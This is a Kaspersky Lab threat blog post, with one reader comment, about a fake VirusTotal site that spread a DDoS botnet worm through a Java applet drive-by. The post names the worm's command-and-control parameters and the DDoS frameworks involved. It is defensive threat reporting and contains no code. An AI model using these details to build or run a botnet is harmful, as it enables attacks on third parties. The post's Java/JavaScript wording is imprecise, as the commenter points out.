The Internet threat alert status is currently normal. At present, no major epidemics or other serious incidents have been recorded by Kaspersky Lab’s monitoring service. Internet threat level: 1

Fake virustotal website propagated java worm

Jorge Mieres
Kaspersky Lab Expert
Posted May 24, 00:48  GMT
Tags: Botnets, DDoS, JavaScript

The infection strategies using java script technology are on the agenda and that because of his status as a "hybrid", criminals looking to expand its coverage of attack recruiting infected computers regardless of the browser or operating system you use.

In terms of criminal activities, the techniques of Drive-by-Download by injecting malicious java script in different websites, are a combo of social engineering that requires users to increasingly sharpen the senses of "detection".

During this weekend, we encountered a fake website of the popular system analyzes suspicious files Virustotal, by Hispasec company, touted to infect users through the methods mentioned above.

A view of users, the website looks the same way as the original. However, hidden in the source the parameters needed to infect the system through a java applet through which discharge completely silent malware detected by Kaspersky Lab as Worm.MSIL.Arcdoor.ov.

The worm is developed to recruit zombies that will be part of a botnet designed primarily to perform DDoS attacks synflood, httpflood, udpflood and icmpflood. The communication focuses on a C&C that stores information obtained from the victim machine. Some of the parameters involved in the communication are:

& mode: type of DDoS attack

&botver: malware version

&pcname: name victim machine (hostname)

&winver: type and versión of operating system

Usually these attacks through a centralized hub from which the attacker manages malicious maneuvers using web applications DDoS Framework such as N0ise (used in this case), Cythosia, or NOPE. Such applications have a high impact and demand in terms of development, especially since the European zone of Germany.

Kaspersky Lab detects this threat proactive and continues the investigations into these criminal activities.



2011 Aug 15, 10:19

Kaspersky - You need help!

You don't know how funny I find this. You're representing Kaspersky and you don't even know what a Java Drive-By is? Okay, let me explain to you what a Java Drive-By is so you can re-write this article correctly. A Java Drive-By is a web application that can be used to download an executable file pretty much anywhere on the user's computer and executed once downloaded when they press "Run".

I honestly don't understand why you put "JavaScript" as one of the tags when "Javascript" is not even involved in any of this. Please learn the difference between Javascript and Java. Let me explain it better yet. Javascript is a type of website coding that is used for websites and Java is used as a program or application. Javascript doesn't even have access to the computer like Java has, cause Javascript is a language that is used for websites.

If you would like to comment on this article you must first

Bookmark and Share